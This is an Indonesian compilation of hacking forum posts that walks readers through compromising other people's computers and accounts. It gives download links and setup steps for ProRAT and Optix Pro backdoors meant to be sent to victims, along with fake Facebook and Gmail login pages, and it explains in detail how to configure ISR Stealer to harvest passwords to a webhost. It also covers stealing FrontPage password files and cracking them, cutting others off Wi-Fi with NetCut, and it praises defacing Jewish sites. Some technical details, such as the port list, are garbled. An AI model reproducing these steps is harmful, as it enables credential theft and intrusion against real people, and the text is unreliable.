4.Abis itu lo masukin password yang mau lo isi sewaktu lo ketik di command promptnya emang ga bakal tertulis alias kaya kaga diketik cuma lo harus inget aja apa yang udah Km ketik abis itu "Enter"

5.Abis itu masukin lagi password yang tadi lo masukin (confirm)

Contoh:

Misal account adminya: kunyuk

Km ketik di command prompt

Net user kunyuk * <<

Terus masukin password yang baru 2 kali.

Met Di Coba.

Backdoor!! NGONTROLIN KOMPUTER ORANG

Pernah denger istilah backdoor? kalo belum tahu search aja di google kk banyak infonya kok.

jadi kita bisa ngontrolin komputer orang lain jarak jauh , dengan cara menyusupkan trojan (iya mengandung virus)

jadi begini cara kerjanya:
kita bikin server kita bisa edit iconnya sendiri
nah servernya kita kriim kek komputer korban bisa lewat flashdisk/via email ato yang lainnya
terus entar korban buka servernya itu , tanpa disadari itu adalah virus (backdoor) dan komputer korban telah terkoneksi ke kita.
lalu kita bisa ngontrol komputer korban lewat komputer kita.

bisa download tool nya disini:
download optix pro di sini:
http://www.filestube.com/9da36a8849b3f82403ea,g/Optix-Pro-1-33.html

atau download prorat:
http://www.hacker-soft.net/Soft/Soft_11755.htm

kalau enggak ngerti cara kerjanya ada TuTnya di youtube cara makenya

TuT prorat:
http://www.youtube.com/watch?v=8OKMELrLU3Q

TuT Optix pro:
http://www.youtube.com/watch?v=Ja630byDEmc

SELAMAT MENCOBA

(WARNING:mengandung virus...setelah anda membuat servernya JANGAN DI KLIK SERVERNYA jika di klik maka anda akan terinveksi virus,seharusnya servernya di klik pada komputer korban)

Hacking Facebook Account

Banyak orang bertanya tanya, bagaimana cara melakukan Hacking Facebook.
Mungkin kalo istilah Hacking Facebook tidak tepat, ilmu saya belum sampai kesana, he he he
yang tepat adalah hacking facebook account.

Oke, kita mulai saja.
Hacking facebook account bisa dilakukan dengan banyak cara dan banyak jalur, baik dengan cara akses kedalam komputer target, lewat network, bantuan google, atau juga dapat menggunakan media exploit untuk mendapatkan email dan password.

Untuk hacking facebook account, jika kita bisa dapat akses ke komputer target, banyak yang bisa dilakukan. Yaitu :
- memasang keylogger
- Menggunakan Fake Login
- Buka save password firefoxnya
- Membaca karakter * pada browsernya
- dll

Untuk hacking facebook account yang dilakukan dengan akses jaringan, misalkan teman kantor, teman warnet, atau apapun, bisa gunakan :
- Arp Poisioning dengan Cain dan Abel
- dll

Untuk hacking facebook account secara random, dapat menggunakan:
- Search Engine Hacking
- Email Dumping
- dll

Nah, untuk hacking facebook account dengan sasaran target yang dituju (ini paling favorite) ada cara cara khusus, yaitu salah satunya adalah menggunakan exploit dan shellcode

jadi jangan malas untuk belajar jngan jadi orang yg mauy nerima saja,inget u dlahirkan spaya berguna d dunia bukan jadi SAMPAH MASARAKAT.

Postingan di ambil dari Forum Diskusi Hacker Liar Facebook.

Panduan Hacker dari Irhaby_007 #1 - #3

Kalian tidak akan bisa jadi hacker sejati dalam sehari semalam.
Juga, hacker sejati bukanlah mereka yang main pake program bikinan orang. Hacker sejati adalah yang bisa memunculkan berbagai penemuan baru.
Sebab, keberhasilan yang berhasil dicapai seorang hacker, siapa pun orangnya, tetap saja keberhasilan itu dinisbatkan kepada si penemu program.
Jadi bisa saja apa buah karya hacker lain menjadi terkenal manakala program yang ia rancang sampai ke tangan semua orang. Padahal, ini belum berbicara kemungkinan si hacker pembuat program yang kamu pakai menyisipkan celah-celah yang memungkinkan dia meng-hack komputer kamu ketika kamu menggunakan program tersebut.

ISTILAH-ISTILAH DASAR:

1. TEL-NET
Ini adalah program berukuran kecil yang ada di sistem operasi windows. Dengan menguasai program ini, kita bisa melakukan koneksi dengan server atau operator dan melakukan aksi apa pun sesuai dengan tingkat penguasaan. Biasanya, hacker memakai Tel-net untuk mengetahui cara mengaktifkan sebuah situs, berikut server yang digunakan, kemudian melakukan koneksi dengan port tertentu –khususnya port FTP— untuk bisa menyusup ke situs yang akan diserang secara sembunyi-sembunyi, sehingga bisa membaca file-file situs tersebut dan mencuri file password maupun yang lain dari explorernya. Untuk mengaktifkan tel-net, silahkan klik:
START à RUN àTelnet
Setelah itu akan muncul tampilan Tel-net. Ada satu program yang mirip dengan Telnet, namanya program SSH, ia memiliki ciri khas dalam masalah coding. Cuman, data-data yang akan ditransfer mesti menggunakan coding. Wallohu A‘lam.

2. PROGRAM SCANNER
Ini adalah salah satu program yang fungsi utamanya men-scan situs dan menyingkap celah-celahnya (atau diistilahkan: bugs) jika ada. Cara kerja program ini terhitung cepat. Di samping itu, program ini punya base (landasan) yang luas dan besar. Program ini juga berisi beberapa daftar bugs dan eksploit (salah satu jenis penyerangan bugs dengan cara khusus) yang biasanya dipakai pada suatu situs untuk mengetahui servernya dapat diserang pada celah tertentu atau tidak. Di antara program yang memiliki perangkat ini adalah Shadow Security Scanner, Stealth, dan Omran Fast.

3. EKSPLOITS
Adalah program penembus yang dijalankan melalui windows eksplorer. Program ini memakai alamat URL. Eksploit mampu menampilkan file-file sebuah situs, bahkan sebagian ada yang bisa masuk dan berselancar di dalam server. Ada juga Eksploit yang mampu menyerang port tertentu di dalam server dengan melakukan “cra ck”, yang disebut program Over Flow Eksploits Buffer. Ada bermacam-macam Eksploits, di antaranya adalah: CGI Exploits, CGI Bugs, Unicode’s Exploits, Buffer over Flow Exploits, PHP Exploits, DOS Exploits. Semua program di atas juga berfungsi melindungi server dari serangan jika terdapat bugs, walaupun server tersebut tidak dilengkapi dengan program Fire Wall sama sekali. Ada juga beberapa ekspoits yang ditulis dengan bahasa C, berekstensikan: ***.c
Exploits jenis ini memerlukan compiler atau program penerjemah yang akan menerjemahkannya menjadi eksploits yang dijalankan dengan cara biasa pada explorer.
Untuk merubah eksploits-eksploits berbahasa C menjadi ekploits yang bisa dipakai secara biasa, diperlukan sistem operasi Linux atau Unix, atau program compiler lain yang bisa dipakai dalam sistem operasi windows. Program compiler paling terkenal yang berfungsi sebagai penerjemah dan pengubah, adalah program Borland Compiler C++, program ini biasa digunakan untuk sistem operasi windows.

4. FIRE WALL (Dinding Api)
Ini adalah program yang dipakai untuk melindungi server dari “tamu-tamu” tak diundang yang memasuki file-filenya. Fire Wall bisa dikatakan sebagai pelindung paten dari server. Hanya, perlu saya ingatkan, bahwa program-program Fire Wall yang dipakai untuk memprotek suatu situs, berbeda dengan sistem proteksi yang dipakai untuk melindungi PC.

5. SHADOWED PASSWORD FILE (File Pass Word yang Terselubung)
Ini adalah file yang berisi password dengan bentuk *, atau x. Untuk file password biasa, sintaks-nya adalah sebagai berikut:
Username: passwd: UID: GID: full name: directory: shell
Pada sintaks di atas, Antum bisa menemukan kode password setelah Username dan titik dua.
Adapun pada file yang telah dishadow, bentuk sintaksnya berubah menjadi:
Username: x: 503: 100: Full Name: /home/username: /bin/sh
Di sini, jelas bahwa posisi kode password telah dirubah bentuknya menjadi “x”.
Setelah file password di shadow, Antum bisa menjumpai file password lain yang berisi kode password. File inilah yang disebut Shadow File, Antum bisa temukan pada directory berikut:
/etc/shadow
Pada file, bentuk sintaksnya adalah:
Username: passwd: last: may: must: warn: expire: disable: reserved
Kali ini, Antum bisa meng-copy kode password dari sintaks di atas, lalu meletakkannya pada file yang sudah ter-shadow, sehingga file yang terselubung itu berubah seperti file password biasa.

6. ANONYMOUS CONDITION
Kondisi tersamar dan tidak dikenal ketika memasuki sebuah situs yang di-hack.
Ada program yang hampir mirip dengan FTP, yang memiliki kelebihan bisa Antum gunakan memasuki server dengan kondisi samar, setelah itu mencuri file-file yang ada di dalamnya (jika memang server itu mengizinkan).

7. CELAH-CELAH YANG TIDAK TERPROTEKSI (VULNERABILITIES)
Yaitu celah-celah atau titik-titik lemah (bugs) yang tidak terjaga, atau memungkinkan untuk diserang, pada sebuah server. Ini merupakan bahaya keamanan bagi server, karena bisa digunakan para hacker untuk menyerangnya, meng-hacknya, atau bahkan menghancurkannya.
Vulnerable artinya adalah celah, atau lebih tepatnya titik lemah, atau posisi yang tidak diamankan dengan baik. Kata-kata ini banyak sekali tercantum pada daftar e-mail yang masuk pada situs-situs yang isinya terfokus pada masalah security dan keamanan jaringan. Contohnya pada daftar e-mail yang tercantum pada situs Security Focus, alamatnya adalah: http://www.securityfocus.com/ Atau pada Booktrack-nya, yaitu: http://www.securityfocus.com/archive/1. Dan lain-lain.

8. PASSWORD FILE (File Password)
Adalah file yang berisi kode password pada Root dan password-password user yang dibolehkan memasuki server. Password situs tentu saja juga ada dalam file ini.
Yang perlu dicatat di sini, semua password di dalam file ini masih berbentuk sandi.

9. Root (Akar)
Maksudnya adalah pengguna paling utama dalam sebuah aturan situs, dialah yang bisa berbuat apa saja terhadap semua file yang ada dalam situs dan server, sejak dari men-delete, menambah, mau pun memperbaiki file-file yang ada (atau dalam sistem operasi windows setara dengan administrator). Nah, biasanya, password Root adalah password situs juga, jika situs itu dioperasikan dengan menggunakan sistem operasi Lynux, Unix, Sholary, Free BSD, atau yang sejenis.

10. SERVER
Server adalah perangkat operasi sebuah situs, semua file suatu situs terletak di dalamnya. Jadi, server adalah perangkat komputer biasa, sama seperti perangkat-perangkat lain, hanya ia memiliki banyak kelebihan seperti besarnya memori dan kecepatan akses yang luar biasa. Server selalu tersambung dengan internet selama 24 jam. Koneksi terhadap server inilah yang menjadikan situs bisa diakses dan digunakan dalam jaringan internet selama 24 jam. Satu server bisa menampung lebih dari satu situs, tergantung pada jenis server dan perusahaan yang memilikinya. Serangan hacker, jelas ditujukan untuk menyerang server yang banyak memiliki situs; sehingga dengan begitu akan mudah untuk meng-hack semua situs yang ada di bawah ayahan-nya. Selanjutnya, terserah, bisa menghancurkan situs-situs tersebut, mempermainkan file-filenya, memperburuk tampilannya (deface), mencuri data-data, merusaknya, atau bahkan men-delete nya sama sekali dari sebuah situs. Dan alhamdulillah, inilah yang sering menimpa situs-situs yahudi, jazakumulloh khoiron ya…! wahai para mujahidin.

11. BUFFER OVER FLOW
Ini adalah salah satu dari sekian jenis Eksploits, yang digunakan untuk menyerang salah satu titik pada server (port server) sehingga titik tersebut penuh. Misalnya menyerang port FTP, atau yang lain. Tujuannya untuk memperlemah koneksi server, atau memutusnya sama sekali dengan port-port yang ada. Atau untuk menghilangkan proteksi yang ada, sehingga server bisa dimanfaatkan sewaktu-waktu tentunya setelah terlebih dahulu meng-cra ck server tersebut. Ketika nanti kembali terkoneksi dengan server itu, dengan mudah server itu bisa digunakan dan mengambil data-data di sana tanpa ada satu penghalang pun (sebab setelah meng-cra ck proteksi suatu server, memasukinya menjadi sangat mudah tanpa ada penghalang berarti). Ini mirip dengan aksi pemutusan sistem operasi, sebab ini sama dengan melakukan overload pada salah satu titik dalam server.

12. BOX
Banyak para hacker yang gemar memakai istilah Box ketika menyebut kata “Supercomputer”, “Server”, atau “PC”.

13. SUPER USER
Yaitu sistem yang akan kita serang nanti –dengan pertolongan Allah, daya dan kekuatan-Nya—yang beranggotakan beberapa user. User yang memiliki hak total –atau hampir total—biasa disebut Super User. Super User biasanya menjad Root, Admin, atau pemimpin sistem dalam situs.

14. SHELL ACCOUNT
Shell account adalah sebuah sistem operasi, yang dengannya Antum bisa mengendalikan komputer dari jarak jauh. Tetapi komputer itu harus berbasis linux. Antum bisa memasuki sistem operasi Shell Account melalui Tell Net atau SSH, yang sudah kami bahas di muka.

15. WEB SERVER
Yang paling populer ada dua:
- IIS dari Microsoft. Ini banyak sekali memiliki celah, (situs-situs pengguna web server ini yang celahnya tertutup sangat sedikit)
- APACHE. Ini berasal dari kumpulan programmer di seluruh dunia. Menghack nya boleh dibilang cukup sulit. Sebab apache adalah web server yang sumbernya terbuka dari mana saja dan selalu mengalami perkembangan.

16. SYSTEM
Ada banyak sekali sistem, di antaranya: SunOS, FreeBSD, OpenBSD, NetBSD, AIX, IRIX, Windows/NT/2000/xp, Linux dengan berbagai versinya, seperti Red Hat, Veduro, dll

17. LINUX
Linux mempunyai enam direktori, yaitu:
- Bin, khusus untuk file-file binary (digital) untuk mengoperasikan sistem
- Etc, yaitu file-file berisikan semua administrasi sistem, termasuk account
Root yang merupakan inti pengendali sistem, termasuk juga password. (Bagian ini sangat penting sekali untuk dipelajari dan dibuka isinya ketika kita akan melakukan aksi hacking, biidznillah…)
- Dev, berisi file-file program
- Lib, berisi kumpulan data tentang sambungan dinamik yang membantu sistem dalam beroperasi
- Tmp, yaitu file-file sementara dan tidak tetap
- Usr, berisi nama-nama user sekaligus password mereka yang memiliki account dalam sistem (mempelajari bagian ini juga tak kalah pentingnya)

18. PERINTAH-PERINTAH (COMMAND) DALAM “FTP”
a. “pwd”, berfungsi untuk mengetahui isi harddisk.
b. “cd”, berfungsi untuk menerobos folder atau direktori suatu sistem operasi. Contoh, ketika saya menulis: Cd black, berarti saya sedang menerobos masuk ke dalam bagian yang disebut “black.”
c. “is”, untuk mengetahui isi dari bagian utama suatu sistem operasi, bisa juga untuk mengetahui isi hardisk. Sama dengan perintah “dir” dalam DOS.
d. “get”, berfungsi untuk mendownload file yang diinginkan. Contoh: get black.exe, maka maksudnya adalah mendownload file “black.exe” dari server untuk diletakkan pada komputer Antum, pada bagian utama yang sedang Antum buka sebelum mengetikkan perintah FTP (biasanya tercantum pada desktop)
e. “put”, yang merupakan kebalikan dari “get”. Artinya, Antum mengambil file milik Antum, lalu Antum letakkan pada komputer korban. Contoh: put black.exe. Di sini, file yang akan ditaruh itu harus ada di bagian utama yang sedang Antum akses sebelum menjalankan FTP, dan biasanya itu ada pada desktop.
f. “close”, yang berfungsi untuk memutuskan koneksi dengan korban. Antum bisa mengoperasikan FTP pada windows, caranya: klik START��RUN��ftp –n hostname

19. PORT-PORT DALAM PROGRAM
1) 7 Echo
2) 21 Telnet
3) 23 ftp
4) 25 SMTP
5) 80 http
6) 110 pop

20. MEMPERHATIKAN PERINGATAN TERJADINYA KESALAHAN TERTENTU (ERROR)
Yang paling populer adalah peringatan Error 404, peringatan ini muncul ketika kita meminta sebuah file yang tidak ada pada situs. Ketika muncul tampilan peringatan seperti ini, perhatikan di bagian bawah, tercantum beberapa data, salah satunya adalah sumber (source) dari web server. Data-data itu tidak penting dan tidak terlalu berbahaya, namun ada gunanya ketika nanti kita melakukan aksi hacking, bi idznillah…

21. LETAK-LETAK FILE PASSWORD BERADA
Daftar berikut ini disesuaikan dengan sistem operasi yang digunakan,
a. Pada SunOS 5.0 :etc/passwd atau ets/shadow
b. Pada linux :etc/passwd atau ets/shadow
c. Pada BSD 4.3 –RENO :etc/master.passwd
d. AIX :etc/security/passwd
e. WINDOWS NT :script/passwd

22. PROGRAM JHON THE RIPPER
Salah satu program terbaik untuk memecahkan kode rahasia (password) yang didapat oleh para hacker dari sistem operasi nix* (maksudnya Linux dan Unix). Sistem operasi nix* ini –apalagi yang versi paling anyar—berisi sistem proteksi tambahan di samping file password, artinya file password itu ter-shadow (terselubung). Maka, seorang hacker harus terlebih dahulu mendapatkan file shadow untuk bisa mendapatkan file password yang terselubung itu. Setelah menemukan file itu, barulah ia bisa memecahkan passwordnya. Inilah sebenarnya yang menjadi pekerjaan utama dan menurut saya merupakan langkah paling penting, dalam menyerang sistem operasi. Sebab, ini yang akan memberikan kunci kepada Antum, dengan pertolongan Allah SWT.

LANGKAH MELAKUKAN HACKING

Akhi karim… sebelum kita melanjutkan pembahasan ini secara lebih dalam, Antum harus catat bahwa langkah nge-hack yang akan kami jelaskan berikut ini hanya satu dari sekian cara yang banyak, dan bisa jadi langkah ini sudah tidak up to date.

Tapi yang penting, yang harus Antum ketahui di sini adalah, bagaimana sih melakukan hack secara umum? Bagaimana Antum tahu cara mencari bugs dari sistem-sistem,
kemudian bagaimana cara memanfaatkan bugs tersebut. Dengan mengetahuinya, atas pertolongan Alloh akan membantu maksud mulia kita.

Langkah pertama dalam hacking adalah mengumpulkan data. Artinya, dalam suatu situs, kita harus tahu web servernya, sistem operasinya apa, dan program bantu apa saja yang dipakai. Misalnya, kita sekarang menghadapi sebuah situs. Nah, kemudian, bagaimana caranya agar kita bisa mengetahui sistem operasinya, web server nya, program bantunya, dan semua data tentang situs tersebut.

Untuk mengetahui semua ini, bisa kita masukkan nama situs yang kita maksud pada salah
satu website di bawah ini. Website-website ini akan memberikan data ringkas kepada kita
tentang sistem operasi yang digunakan situs tersebut, web servernya, dan lain sebagainya.

Website-website itu adalah: http://www.netcraft.net/ Dan http://www.whois.com/
Catatan penting:
Jangan mengetikkan http:// atau tanda / yang ada di akhir alamat URL, ketika Antum mengetik alamat website di atas.

Antum juga bisa mendapatkan data-data tentang sebuah situs dengan cara mencoba memasuki situs tersebut melalui program Tel Net.


a. Contoh situs pengguna IIS sebagai web server

Kalau kita memasukkan nama sebuah situs pada website netcraft, akan muncul data-data berikut:
This site http://www/.***.com is running
Microsoft-Windows 2000 on IIS/5.0

Ok…dari sini, kita mendapatkan dua data penting. Pertama, situs ini menggunakan ISS 5.0 sebagai web server.
Kedua, sistem operasi yang dipakai adalah windows 2000.

Langkah yang harus dilakukan berikutnya adalah:
1. Kita coba untuk mencari bugs yang ada pada IIS 5.0 pada situs ini. Ok,sekarang, ada satu hal lagi yang harus dikuasai, yaitu masalah Unicode. Dengan Unicode, sebuah situs bisa diserang melalui explorer-nya, hanya saja Unicode tidak berfungsi untuk selain web server ISS. Unicode adalah alamat panjang yang dituliskan di bagian belakang, setelah menulis alamat sebuah situs.
2. Kalau tidak ketemu juga bugs nya, kita coba untuk mencari bugs dari Windows 2000. Ok, sementara kita anggap langkah ini pun tak membuahkan hasil. Jadi…?
3. Lihatlah isi situs tersebut, barangkali di sana ada menu login sebagai pengunjung, atau menu forum (muntada dalam bahasa arabnya), atau yang semisal…

(Ini adalah contoh dalam memilih cara menyerang situs, yaitu dengan berdasarkan data sebuah situs kita berusaha mencari bugs yang bisa dimasuki untuk menyerang situs tersebut, dengan bantuan Alloh tentunya.


b. Contoh situs pengguna Apache sebagai web server

Kita ambil contoh situs:
http://www.arank.com/
Kalau situs ini kita kupas dengan situs netcraft, hasilnya adalah:
The site http://www.arank.com/is running
Apache/1.3.20 (UNIX) mod_gzip/1.3.19.1a
mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6
mod_log_bytes/0.3 FrontPage/5.0.2.2510
mod_ssl/2.8.4 OpenSSL/0.9.6 on Linux

Ada tiga hal penting buat kita pada data di atas:
1. Web servernya adalah Apache 1.3.20
Pertama yang harus kita ingat, Apache adalah web server yang sulit diserang (tapi bukan mustahil lho…), kecuali beberapa versi saja yang agak mudah. Ok, sementara kita lewati dulu pencarian bugs pada web server Apache.
2. Situs ini ternyata menggunakan program bantu Front Page /5.0.2.2510. Na…untuk program ini banyak sekali celahnya.
3. Sistem operasi yang dipakai adalah Linux. Menyerang sistem Linux boleh dikata paling sulit daripada sistem operasi lain. Wallôhu A‘lam

Baiklah, sekarang akan coba kita jabarkan kelemahan-kelemahan yang ada pada program
Front Page.

Seperti sudah kami katakan, program ini banyak sekali memiliki kelemahan. Kelemahannya di samping banyak juga besar, kira-kira begitu lah… Di antara kelemahan itu adalah folder _vti_pvt dan private. Inilah bagian yang akan kita serang, karena untuk folder lain biasanya tidak terlalu berguna. Dalam dua folder ini, akan kita temukan empat file penting, yaitu:
1) service.pwd
2) users.pwd
3) authors.pwd
4) administrators.pwd

Ini adalah file paling bahaya, kalau lah kita hanya bisa mendownload satu dari empat file ini, (ingat, celah seperti ini ada pada 70% situs-situs yang tersebar di dunia maya), kemudian kita buka file itu dengan mafkarah, akan kita lihat hasil berikut:
Goodyco: CalXS8USI4TGM

Ini kita ambil dari sebuah situs tertentu…
http://www/.***.com/_vti_pvt/service.pwd
Dari sini kita ketahui, Goodyco adalah usernya, sedangkan password yang masih tersandi itu adalah CalXS8USI4TGM. Selanjutnya, bagaimana memecahkan kode password ini?

Kita akan memecahkan kode password ini melalui program Jhon The Ripper (penjelasan tentang penggunaan program ini ada di akhir pembahasan, Insyâ Allôh)

Sekarang kita beralih kepada bagian ketiga yaitu sistem operasi yang digunakan. Seperti kita ketahui dari data di atas, sistem operasi yang dipakai situs itu adalah Linux. Tapi, linux yang versi apa? Ada linux Red hat, ada Mandrix, dan banyak lagi versi lain, dan bugs nya pun juga lebih banyak lagi. Tetapi, yang jelas pada saat seperti ini Antum akan menghadapi dua masalah.

Pertama, bagaimana mengetahui jenis sistem operasinya?
Antum bisa mengambil informasi tentang sistem operasi yang dipakai melalui program Tel Net. Caranya, tulis alamat URL situs, nanti akan muncul data tentang sistem operasinya: jenisnya, versinya, dst.

Masalah kedua, Antum mesti punya sistem Linux, sebab bugs yang ada menggunakan bahasa C, padahal bahasa C hanya bisa dipakai dalam sistem operasi Linux saja.

Kesimpulan:
Dari penjabaran di atas, nampak bahwa aksi hacking itu terdiri dari dua bagian: pertama, mengumpulkan data tentang situs yang menjadi target, kemudian kedua melakukan serangan ke situs itu berdasarkan data yang didapat.

Pada keterangan tadi, kita telah menyelesaikan urusan mengumpulkan data. Sekarang, bagaimana cara melakukan serangan kepada target, berdasarkan data yang sudah
dikumpulkan. Ada beberapa situs, yang menampilkan bugs-bugs dari web server, sistem operasi, dsb, secara berkala dan up to date. Inti tugas kita selanjutnya adalah, mempelajari bugs-bugs itu, lalu memanfaatkannya secara benar, dengan pertolongan Alloh tentunya.

Situs yang menyediakan jasa penampilan bugs ini, di antaranya adalah: http://www.ussbrack.com/

Situs ini sangat-sangat penting. Setelah membukanya, cari menu Exploits yang ada di bagian kiri tampilan, lalu klik pilihan pertama. Di sini akan Antum temukan semua bugs pada semua sistem operasi, sejak dari Linux, Windows, dll; jenisnya pun bermacam-macam, ada bahasa C, Perl, Unicode, dsb.

Ada situs lain yang semisal, yaitu: http://www.neworder.box.sk/
Situs ini sangat membantu sekali. Sekedar contoh, coba Antum tulis pada kotak yang ada pada bagian kiri situs ini: IIS, atau: Apache, atau nama forum sebauh situs dan nama yang mengeluarkannya, atau program apa saja yang menurut Antum terlihat ada celah kelemahannya.

Situs-situs penyedia Archive berisi bermacam-macam bugs:
http://www.securiteam.com/exploits/archive.html
http://www.ussrback.com/
http://www.secureroot.com/
http://www.rootshell.com/
http://www.secureroot.com/category/exploits.

Oke selamat di coba.?

Postingan di ambil dari Forum Diskusi Hacker Liar Facebook.

Trik Mencuri Bandwidth

Terpikirkan oleh saya bahkan anda seandainya bisa menggunakan hotspot secara sendirian dan tidak ada satupun yang boleh nyambung dalam hotspot itu begitu enaknya ya internetan. Saya kemudian browsing di internet, lalu muncullah sebuah software NetCut.

NetCut yang berarti Network Cut. Network berarti jaringan sedangkan Cut adalah gunting, jadi secara bahasa tools ini dapat diartikan sebagai tools pemotong jaringan.

Download dulu softwarenya :
http://www.ziddu.com/download/4684750/NetcutDV21.0.rar.html

berikut penjelasannya :

1. Instal NetCut, kemudian ikuti tahapan-tahapan yang ada.
2. Bila proses instal telah selesai, silakan restart pc anda
3. Kemudian jalankan Program NetCut, maka akan tampak IP yang sedang aktif
4. Pilih IP yang akan anda jadikan mangsa, senjutnya klik Cut Off dan IP target akan terputus dari server dan jatah bandwidthnya jadi milik anda. hehehe.... kejam yah.

Disini saya hanya share saja tentang ilmu yang saya dapat, tidak ada maksud untuk mengajari hal-hal yang buruk. Selebihnya tergantung dari setiap individu masing-masing. Mau digunakan untuk kebaikan apa kejahatan. Sekali lagi saya tekankan, jangan digunakan untuk iseng atau kegiatan yang dapat merugikan orang lain. Misalnya, anda lagi mendownload software sebesar 200 Mb dan proses sudah berjalan 95%, tetapi tiba-tiba koneksi terputus?? bagaimana perasaan anda??

Saya tidak bertanggung jawab dengan segala hal yang akan terjadi setelah anda mencoba trik Cara Mencuri Bandwidth Wifi/Lan Menggunakan NetCut ini.

Postingan di ambil dari Forum Diskusi Hacker Liar Facebook.

fake LOGIN [facebook & Gmail]

MIRROR :
direct LINK..

Successful
File Name : 368428gmail_fake_login.php
File Url : http://radar9.com/html/368428gmail_fake_login.php
File Size : 1248
File Type : application/octet-stream

Successful
File Name : 3562944facebook_fake_login.php
File Url : http://radar9.com/html/3562944facebook_fake_login.php
File Size : 1249
File Type : application/octet-stream

JUST SHARE :..^_^

Postingan di ambil dari Forum Diskusi Hacker Liar Facebook.

GAMBAR [dot] *.GiF di FacebooK

Sedikit Keterangan dulu dech,,, biar tau Fungsinya..!!
███████████████████████████████████████

http://www.facebook.com/connect/prompt_feed.php?api_key=2361831622 <=== [ link api key nya ]

&attachment={"name": "dic.exe", <== [ tulisan yg tampil di depan atto "owned" ]

"href": "http://www.facebook.com/pkecil", <== [ klo di klik yg atas "owned" nanti masuk nya ke fb sendiri ]

"description": "ArT", <===== [ judul gambar yg mau di posting ]

"media": [{"type": "image",

"src": "http://i289.photobucket.com/albums/ll238/vienmar01/batch2/gif14.gif", <==== [ cari gbr.gif di google banyak ]

"href": "http://www.facebook.com/pkecil"}]} <=== [ klo di klik gambar masuk ke fb yg punya postingan ]

&target_id=1463021944 <==== [ id fb sendiri atto target yg mau di tampilkan gbr gerak atto | dot | gif ]
███████████████████████████████████████
Copas [ copy + paste ]
iNiH
[]
[]
[]
\/
███████████████████████████████████████
http://www.facebook.com/connect/prompt_feed.php?api_key=2361831622

&attachment={"name": "dic.exe",

"href": "http://www.facebook.com/pkecil",

"description": "ArT",

"media": [{"type": "image",

"src": "http://i289.photobucket.com/albums/ll238/vienmar01/batch2/gif14.gif",

"href": "http://www.facebook.com/pkecil"}]}

&target_id=1463021944
███████████████████████████████████████
TarO / simpan di URL baru enTeR

Selamat Mencoba ^_^

Hacker wannabe ngaku bisa hack fb padahal cuma pake facebook

Pernah denger facebook freezer msn freezer etc...???
Yang orang2 yang ngaku dirinya bisa hack faceobok orang,padahal cuma pake facebook freezer???
Ya kita pantas nyebut dia "Script Kiddie" atau "hacker wannabe"(atau dua duanya lbih tepat)
program itu dibuat pakai visual basic 6.0 , dan sebetulnya faceobok freezer yang kamu pakai cara kerjanya hanya mencoba login ke email facebook yang kamu tulis berkali2 dengan password salah,yang menyebabkan error dan access denied.karena facebook akan mengira bahwa kamu ini mau nyoba2 passwordnya.cara ini juga bisa dilakukan manual dengan begitu.jadi..buat apa bangga2 punya facebook freezer?dan facebook freezer sih bener berhasil.tapi cuma berlaku 2/5 menit,setelah itu bisa login kembali.

Postingan di ambil dari Forum Diskusi Hacker Liar Facebook.

Tutorial and Pic Hacking Facebook, Email Account , Tagged , Mysapce, dsb

Ane akan memberikan sedikit tutorial buat ngehack ( Tutorial and Pic Hacking Facebook , Email Account , Tagged , Mysapce ,dsb ) semoga bermanfaat.

Pertama. Download Tools nya
ISR stealer
unduh skrg : http://uppit.com/j9rk1o3ixwat/ISR_Stealer_0.3.rar

Ni screen nya
http://www.yourpicbox.com/images/oVUvFBWev15668.png

Ok jika sudah ini tools akan mencuri semua password dan email, seperti pada yahoo mozilla chrome dsb.

Log nya menggunakan hph URL mungkin buat newbi seperti ane dulu ga tau bagaimana tapi akhir nya sekarang bisa..

Liat langkah2 setting UP nya.

1. Register di free webhost : http://members.000webhost.com/login.php jika merasa kesulitan log in gan tulis di google 000webhost members area
liat screen : http://www.yourpicbox.com/images/oahIqhcxJ15669.jpg

2. Sekarang gan masuk ke mysql liat screen : http://www.yourpicbox.com/images/ouwxMuWTH15670.jpg

3. Lanjut kita membuat sql database / register databse : sccren : http://www.yourpicbox.com/images/oiygbxDAM15671.jpg

4. Gan sett configuration php temukan dalam folder ISR stealer jika sudah menemukan edit seperti ini.
screen : http://www.yourpicbox.com/images/oPgIOjhLH15673.jpg . nb log in detail harus d ingat buat log in liat hasil

5. Jika sudah sekarang back to cppanel dan masuk ke file manager screen : http://www.yourpicbox.com/images/ovaFuobTe15674.jpg

6. Masuk ke public html liat http://www.yourpicbox.com/images/oVQvkRpNO15675.jpg

7. Upload kan semua dalam php folder. Liat screen : http://www.yourpicbox.com/images/olRdqBqrE15676.jpg
screen 2 : http://www.yourpicbox.com/images/oiWOKxiCv15677.jpg
checlist terus tanda back pilih.

8. Centong / beri tanda index.php default.php config.php dan isntal. php jika sudah press chmod liat screen
http://www.yourpicbox.com/images/osFkKNfrN15678.jpg

9. Jika sudah gan akan melihat screen ini http://www.yourpicbox.com/images/oYWGWdesK15679.jpg tandai semua yg kosong
jangan disisakan jika sudah press tanda checlist terus klik back.

10. Selanjut nya klik kanan open dalam instal php : liat ini : http://www.yourpicbox.com/images/oBrVFspif15680.jpg
nah nanti gan akan melihat seperti ini : http://www.yourpicbox.com/images/obIWnzWzR15681.jpg

11. Gan instal dibawah nya ad bacaan instal nnti akan keluar seperti ini
http://www.yourpicbox.com/images/oOImoHUxn15683.jpg
jika sudah gan kembali ke http://www.yourpicbox.com/images/oBrVFspif15680.jpg delete instal php nya.

12. Jika sudah ada index.php klik kanan / open liat screen : http://www.yourpicbox.com/images/oBgAeqrnT15684.jpg
maka gan akan terlihat gambar seperti ini : http://www.yourpicbox.com/images/oopQCDDZm15685.jpg
jadilah buat database log nya buat masuk kesana user name dan password ada pada gan pertama setting configuration.

Untuk menggunakan nya

Buka tool yg td anda download dalam php ULR nya sama gan ganti link nya link yg brusan gan buka / klik kanan dalam index.php

yg hasil nya seperti ini : http://www.yourpicbox.com/images/oopQCDDZm15685.jpg itu kan d atas ad link simpan dalam
ISR stealer http://www.yourpicbox.com/images/oVUvFBWev15668.png tuh gntikan php ULR nya

Terus gan test :P klo sudah build .. Jadilah server nah itu dia kirim2kan ke teman2 maka gan akan dapat membaca semua passwords.

NB server yg gan build akan k detect virus matikan lah terlebih dahulu
Semoga bermanfaat.. amin.... Selamat Di coba.

Postingan di ambil dari Forum Diskusi Hacker Liar Facebook.

Cara Menjadi Hacker

